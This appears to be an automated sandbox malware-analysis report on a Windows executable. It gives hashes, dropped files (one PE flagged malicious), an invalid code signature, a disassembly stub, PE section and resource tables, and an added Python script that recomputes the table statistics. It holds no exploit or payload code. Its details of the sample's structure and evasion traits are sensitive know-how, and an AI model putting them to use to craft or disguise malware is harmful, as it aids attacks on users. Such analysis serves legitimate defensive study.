                                                                                                      SHA-512:C1A4E6412FA2C04CB172AF9DEE2F7DD93F8714B3E0CB2C20712F7F1BEB71F8EE2293BDFCBE81EB3BBEA24236958963855DD23C98059FD3B6ED61AB5C9F3DC3D6
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1275486
                                                                                                      Entropy (8bit):7.6512612464596295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:hfJB7Oca2gC/dSipEBZGR31m/UTORv5O1+klFPa0R/ISE8VWcftYQc6vCWAoZmWs:Z7Br1SVBZ4lmsmYNni+ISEuBFh8gdsE8
                                                                                                      MD5:81B48765128043CAF286FDA096616A63
                                                                                                      SHA1:7A7D80908F6A17A8BFA2A08F372EDD83460D9F3D
                                                                                                      SHA-256:C380E7BAA26116D71ACFF5FDF1EC6783AC8A8C93EB5179370EAB08000625621B
                                                                                                      SHA-512:640C5FAA7709719248E0E4935BB531C36A290B83574553262943A46965A949E22EAF3EB3415DE7630591D49D3AE766034A2D03D05750E1E901132B63B08370C3
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\SysWOW64\more.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):541184
                                                                                                      Entropy (8bit):6.530879228641325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:8/zT9HFapB2rA6MNzFhCjzYjGq88DUq18p8sg:bpBbBhCPD8DHSE
                                                                                                      MD5:A3EBAF3CD91B6B57CE7949FC51398080
                                                                                                      SHA1:2F149696DD3F00423062CDF28B6821052D5C1D38
                                                                                                      SHA-256:759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319
                                                                                                      SHA-512:8CD7742BB99DE1C8F09A1CFE2AD63D12C9D2B28A41E4DA86E62A5B4B6A2187BE2230CD5A03CF4FBB23FA6EDB8517238B4C035BB84B2DC15769F17C79D4608BAC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Process:C:\Windows\SysWOW64\more.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):541184
                                                                                                      Entropy (8bit):6.530879228641325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:8/zT9HFapB2rA6MNzFhCjzYjGq88DUq18p8sg:bpBbBhCPD8DHSE
                                                                                                      MD5:A3EBAF3CD91B6B57CE7949FC51398080
                                                                                                      SHA1:2F149696DD3F00423062CDF28B6821052D5C1D38
                                                                                                      SHA-256:759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319
                                                                                                      SHA-512:8CD7742BB99DE1C8F09A1CFE2AD63D12C9D2B28A41E4DA86E62A5B4B6A2187BE2230CD5A03CF4FBB23FA6EDB8517238B4C035BB84B2DC15769F17C79D4608BAC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.332090535652735
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      File name:5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5:ff827141856089465cec7afdc9e65f9d
                                                                                                      SHA1:e985a1d59d90a6522b4077b00bc68c86fc3d72d8
                                                                                                      SHA256:389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
                                                                                                      SHA512:b3624f61c2d0e07d93d96db2632576262a211ec158334703f9f1b003853cfb5c5eefea33cab9c2a813e1dc7099e542062d3c1a44a7a9f1828919880823aa9cac
                                                                                                      SSDEEP:196608:64gA641E83DUpCdO3url7Dtm5fal48DueJO475d:rgdBUfdO3cRDtj/aOd
                                                                                                      TLSH:7DB6D012F688A0BBC057193698378795593777B06E268D973BB40E8C4F36780BA3E747
                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                      Icon Hash:3636276e1c317306
                                                                                                      Entrypoint:0x9d5930
                                                                                                      Entrypoint Section:.itext
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x6684095A [Tue Jul 2 14:06:18 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:dc590f1f896fa986fbb15c6fda7fd22f
                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=Microsoft ID Verified CS EOC CA 01, O=Microsoft Corporation, C=US
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 01/07/2024 16:37:15 04/07/2024 16:37:15
                                                                                                      Subject Chain
                                                                                                      • CN=BURNAWARE SL, O=BURNAWARE SL, L=MARBELLA, S=Málaga, C=ES
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:F53247DEBF3F4A6D95461954E622CA1F
                                                                                                      Thumbprint SHA-1:D5B2FCC7421A032C296119FDA6EAF5A7FC39B7FD
                                                                                                      Thumbprint SHA-256:CD072073D0E45F03C58F8CCE10D56FF6D8C7D93DAFF86CA3709AAF784F7C1E2F
                                                                                                      Serial:330000822E80A10BDCFC2F33C000000000822E
                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      add esp, FFFFFFF0h
                                                                                                      mov eax, 009C67A0h
                                                                                                      call 00007F8C647C1B95h
                                                                                                      xor eax, eax
                                                                                                      push ebp
                                                                                                      push 009D599Ah
                                                                                                      push dword ptr fs:[eax]
                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      call 00007F8C649BEA43h
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      mov dl, 01h
                                                                                                      call 00007F8C649C06B5h
                                                                                                      mov ecx, dword ptr [009FB7B4h]
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      mov edx, dword ptr [009BA9F0h]
                                                                                                      call 00007F8C649BEA35h
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      call 00007F8C649BEB85h
                                                                                                      xor eax, eax
                                                                                                      pop edx
                                                                                                      pop ecx
                                                                                                      pop ecx
                                                                                                      mov dword ptr fs:[eax], edx
                                                                                                      push 009D59A1h
                                                                                                      ret
                                                                                                      jmp 00007F8C647BA5DEh
                                                                                                      jmp 00007F8C64D8674Ah
                                                                                                      call 00007F8C647BAD2Bh
                                                                                                      mov eax, eax
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7c0000 | 0x9b | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7bb000 | 0x3ee2 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82c000 | 0x470c88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xad9400 | 0x3d68 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c3000 | 0x68d8a |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x7c2000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7bbb20 | 0x9a4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x7bf000 | 0xe06 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5d09c8 | 0x5d0a00 | 5b92377a7a8661f70a13742a14fd2326 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5d2000 | 0x39a8 | 0x3a00 | 618a1eb0400f32a57ff05405c91a0755 | False | 0.4857893318965517 | data | 6.148050334224838 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x5d6000 | 0x25afc | 0x25c00 | 66154e56c9542b521f5e08689154755f | False | 0.38093051531456956 | data | 5.838264883060502 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x5fc000 | 0x1be2f4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x7bb000 | 0x3ee2 | 0x4000 | 99f49c0741ca6201b15d7729d418e107 | False | 0.32635498046875 | data | 5.23934204186308 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x7bf000 | 0xe06 | 0x1000 | 31315dbf55dbba6e8d1e768bf9ac3b9c | False | 0.31787109375 | data | 4.074208107173615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x7c0000 | 0x9b | 0x200 | 1a82cdbd2da8404d0d427b18adcfe87f | False | 0.2578125 | data | 1.8184376157820663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x7c1000 | 0x54 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x7c2000 | 0x5d | 0x200 | a5f40a305a312eb3fade2f0c1c6fc10d | False | 0.189453125 | data | 1.3716899805431133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7c3000 | 0x68d58 | 0x68e00 | 1c1b2fa52739d9f264a96f4acc9b929d | False | 0.6061601422824792 | data | 6.761515718855164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x82c000 | 0x470c88 | 0x470e00 | 7edb304dfcef9421729da13cfc317864 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
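Several columns in the two tables above are derived by the sandbox rather than read from the PE headers: the "Is in Section" mapping of each data directory, and the per-section MD5, Entropy and ZLIB Complexity. The Python below is an added example, not Joe Sandbox's code, that recomputes those columns from the values printed above. Two of its definitions are assumptions chosen because they reproduce the report's numbers: a directory is "in" a section only if its whole range fits inside the section's virtual size (which is why IMAGE_DIRECTORY_ENTRY_BASERELOC, 0x68d8a bytes starting at 0x7c3000, gets an empty cell although .reloc starts there: .reloc's virtual size is only 0x68d58), and ZLIB Complexity is the zlib-compressed length divided by the raw length (this gives exactly 3.0 for any 4-byte blob and 5.0 for any 2-byte blob, as the report shows for the tiny COLOR and RT_RCDATA resources). The characteristics bit values are the winnt.h constants. IMAGE_DIRECTORY_ENTRY_SECURITY is deliberately excluded from the mapping because its address is a file offset, not an RVA.

```python
"""Recompute the derived columns of a PE section / data-directory table.

Added example, not Joe Sandbox code. The section and directory values below
are copied from the report above; the "Is in Section" rule and the ZLIB
Complexity formula are assumptions that reproduce the report's own numbers.
"""
import hashlib
import math
import zlib
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Section characteristic bits (winnt.h), the subset the report prints.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_CNT_UNINITIALIZED_DATA: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    IMAGE_SCN_MEM_DISCARDABLE: "IMAGE_SCN_MEM_DISCARDABLE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int


# Section table from the report (name, RVA, virtual size, raw size).
SECTIONS: List[Section] = [
    Section(".text", 0x1000, 0x5D09C8, 0x5D0A00),
    Section(".itext", 0x5D2000, 0x39A8, 0x3A00),
    Section(".data", 0x5D6000, 0x25AFC, 0x25C00),
    Section(".bss", 0x5FC000, 0x1BE2F4, 0x0),
    Section(".idata", 0x7BB000, 0x3EE2, 0x4000),
    Section(".didata", 0x7BF000, 0xE06, 0x1000),
    Section(".edata", 0x7C0000, 0x9B, 0x200),
    Section(".tls", 0x7C1000, 0x54, 0x0),
    Section(".rdata", 0x7C2000, 0x5D, 0x200),
    Section(".reloc", 0x7C3000, 0x68D58, 0x68E00),
    Section(".rsrc", 0x82C000, 0x470C88, 0x470E00),
]

# Non-empty data directories from the report as (RVA, size). SECURITY is left
# out: its "address" is a file offset, not an RVA, so the RVA rule cannot map it.
DATA_DIRECTORIES: Dict[str, Tuple[int, int]] = {
    "EXPORT": (0x7C0000, 0x9B),
    "IMPORT": (0x7BB000, 0x3EE2),
    "RESOURCE": (0x82C000, 0x470C88),
    "BASERELOC": (0x7C3000, 0x68D8A),
    "TLS": (0x7C2000, 0x18),
    "IAT": (0x7BBB20, 0x9A4),
    "DELAY_IMPORT": (0x7BF000, 0xE06),
}


def section_for_rva(sections: List[Section], rva: int, size: int) -> Optional[str]:
    """Section whose virtual range holds all of [rva, rva + size), else None.

    Assumed rule: a directory that overruns the section's virtual size (even if
    it still fits in the file-aligned raw size) maps to no section, which is
    what the report shows for BASERELOC (0x68d8a > .reloc's 0x68d58).
    """
    if size == 0:
        return None
    for s in sections:
        if s.virtual_address <= rva and rva + size <= s.virtual_address + s.virtual_size:
            return s.name
    return None


def map_directories(sections: List[Section] = SECTIONS,
                    directories: Dict[str, Tuple[int, int]] = DATA_DIRECTORIES) -> Dict[str, Optional[str]]:
    return {name: section_for_rva(sections, rva, size) for name, (rva, size) in directories.items()}


def decode_characteristics(flags: int) -> List[str]:
    """Flag names in the order the report prints them (ascending bit value)."""
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition: zlib-compressed length / raw length (>1.0 = incompressible)."""
    if not data:
        return 0.0
    return len(zlib.compress(data)) / len(data)


def section_stats(raw: bytes) -> Dict[str, object]:
    """The MD5 / Entropy / ZLIB Complexity columns for one section's raw bytes."""
    return {"md5": hashlib.md5(raw).hexdigest(),
            "entropy": shannon_entropy(raw),
            "zlib_complexity": zlib_complexity(raw)}


def section_warnings(section: Section, flags: int) -> List[str]:
    """Cheap triage checks applied to one row of the section table."""
    notes = []
    if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
        notes.append("writable and executable")
    if section.raw_size == 0 and section.virtual_size:
        notes.append("no bytes on disk, %#x bytes allocated at load" % section.virtual_size)
    return notes


if __name__ == "__main__":
    for name, sec in map_directories().items():
        print("%-13s -> %s" % (name, sec or "(none)"))
    print(decode_characteristics(0x60000020))
    print(section_stats(b""))  # empty raw data, as for .bss and .tls above
```

Running the script prints the same section for each directory as the table, including `(none)` for BASERELOC, and the empty-input MD5 d41d8cd98f00b204e9800998ecf8427e that the .bss and .tls rows carry. Note that "Entropy" here is Shannon entropy of the raw bytes (so a section with Raw Size 0x0 is always 0.0) and that a ZLIB Complexity above 1.0 means the data already looks compressed or encrypted, which is why the PNG and zlib resources later in the report score just over 1.0.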
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
CLXO | 0x830558 | 0x16bce5 | PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced | English | United States | 0.99542236328125
COLOR | 0x99c240 | 0x4 | data | | | 3.0
COLOR | 0x99c244 | 0x4 | data | | | 3.0
COLOR | 0x99c248 | 0x4 | data | | | 3.0
RT_CURSOR | 0x99c24c | 0x134 | data | English | United States | 0.43506493506493504
RT_CURSOR | 0x99c380 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x99c4b4 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x99c5e8 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x99c71c | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x99c850 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x99c984 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_CURSOR | 0x99cab8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_BITMAP | 0x99cbec | 0x528 | Device independent bitmap graphic, 20 x 16 x 32, image size 1280 | | | 0.048484848484848485
RT_BITMAP | 0x99d114 | 0x468 | Device independent bitmap graphic, 17 x 16 x 32, image size 1088 | | | 0.07446808510638298
RT_BITMAP | 0x99d57c | 0x5a8 | Device independent bitmap graphic, 16 x 22 x 32, image size 1408 | | | 0.0738950276243094
RT_BITMAP | 0x99db24 | 0x600 | Device independent bitmap graphic, 17 x 22 x 32, image size 1496 | | | 0.043619791666666664
RT_BITMAP | 0x99e124 | 0x4e8 | Device independent bitmap graphic, 19 x 16 x 32, image size 1216 | | | 0.05015923566878981
RT_BITMAP | 0x99e60c | 0x5a8 | Device independent bitmap graphic, 16 x 22 x 32, image size 1408 | | | 0.06284530386740332
RT_BITMAP | 0x99ebb4 | 0x5a8 | Device independent bitmap graphic, 16 x 22 x 32, image size 1408 | | | 0.08287292817679558
RT_BITMAP | 0x99f15c | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.33270676691729323
RT_BITMAP | 0x99f584 | 0x428 | Device independent bitmap graphic, 16 x 16 x 32, image size 1024 | | | 0.23966165413533835
RT_BITMAP | 0x99f9ac | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
RT_BITMAP | 0x99fa6c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
RT_BITMAP | 0x99fb4c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
RT_BITMAP | 0x99fc2c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
RT_BITMAP | 0x99fd0c | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
RT_BITMAP | 0x99fdcc | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
RT_BITMAP | 0x99fe8c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
RT_BITMAP | 0x99ff6c | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
RT_BITMAP | 0x9a002c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
RT_BITMAP | 0x9a010c | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_BITMAP | 0x9a01f4 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
RT_BITMAP | 0x9a02b4 | 0x468 | Device independent bitmap graphic, 8 x 8 x 8, image size 64 | | | 0.424645390070922
RT_BITMAP | 0x9a071c | 0x468 | Device independent bitmap graphic, 8 x 8 x 8, image size 64 | | | 0.4228723404255319
RT_BITMAP | 0x9a0b84 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.3794642857142857
RT_ICON | 0x9a0c64 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.16290277243542325
RT_ICON | 0x9e2c8c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.42738589211618255
RT_ICON | 0x9e5234 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5124296435272045
RT_ICON | 0x9e62dc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.475177304964539
RT_DIALOG | 0x9e6744 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x9e6798 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x9e67ec | 0x1bc | data | | | 0.5202702702702703
RT_STRING | 0x9e69a8 | 0x368 | data | | | 0.4025229357798165
RT_STRING | 0x9e6d10 | 0x438 | data | | | 0.37777777777777777
RT_STRING | 0x9e7148 | 0x9b8 | data | | | 0.27773311897106107
RT_STRING | 0x9e7b00 | 0x964 | data | | | 0.27579034941763725
RT_STRING | 0x9e8464 | 0x4d4 | data | | | 0.36650485436893204
RT_STRING | 0x9e8938 | 0x390 | AmigaOS bitmap font "s", fc_YSize 30208, 9472 elements, 2nd "l", 3rd "r" | | | 0.3333333333333333
RT_STRING | 0x9e8cc8 | 0x230 | data | | | 0.5160714285714286
RT_STRING | 0x9e8ef8 | 0x408 | data | | | 0.40794573643410853
RT_STRING | 0x9e9300 | 0x18c | data | | | 0.5808080808080808
RT_STRING | 0x9e948c | 0xcc | data | | | 0.6666666666666666
RT_STRING | 0x9e9558 | 0x114 | data | | | 0.6086956521739131
RT_STRING | 0x9e966c | 0x294 | data | | | 0.4712121212121212
RT_STRING | 0x9e9900 | 0x3ac | data | | | 0.39787234042553193
RT_STRING | 0x9e9cac | 0x3c4 | data | | | 0.3724066390041494
RT_STRING | 0x9ea070 | 0x490 | data | | | 0.3279109589041096
RT_STRING | 0x9ea500 | 0x308 | data | | | 0.3337628865979381
RT_STRING | 0x9ea808 | 0x3a8 | data | | | 0.4337606837606838
RT_STRING | 0x9eabb0 | 0x638 | data | | | 0.332286432160804
RT_STRING | 0x9eb1e8 | 0x424 | data | | | 0.33773584905660375
RT_STRING | 0x9eb60c | 0x344 | data | | | 0.430622009569378
RT_STRING | 0x9eb950 | 0x328 | data | | | 0.375
RT_STRING | 0x9ebc78 | 0x43c | data | | | 0.39206642066420666
RT_STRING | 0x9ec0b4 | 0x1ac | data | | | 0.4672897196261682
RT_STRING | 0x9ec260 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x9ec32c | 0x198 | data | | | 0.5612745098039216
RT_STRING | 0x9ec4c4 | 0x3ac | data | | | 0.3659574468085106
RT_STRING | 0x9ec870 | 0x360 | data | | | 0.38425925925925924
RT_STRING | 0x9ecbd0 | 0x2dc | data | | | 0.38114754098360654
RT_STRING | 0x9eceac | 0x334 | data | | | 0.3280487804878049
RT_RCDATA | 0x9ed1e0 | 0xd5d | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032154340836013
RT_RCDATA | 0x9edf40 | 0xd57 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003221083455344
RT_RCDATA | 0x9eec98 | 0xcfc | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003309265944645
RT_RCDATA | 0x9ef994 | 0xcd9 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033444816053512
RT_RCDATA | 0x9f0670 | 0xd5d | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032154340836013
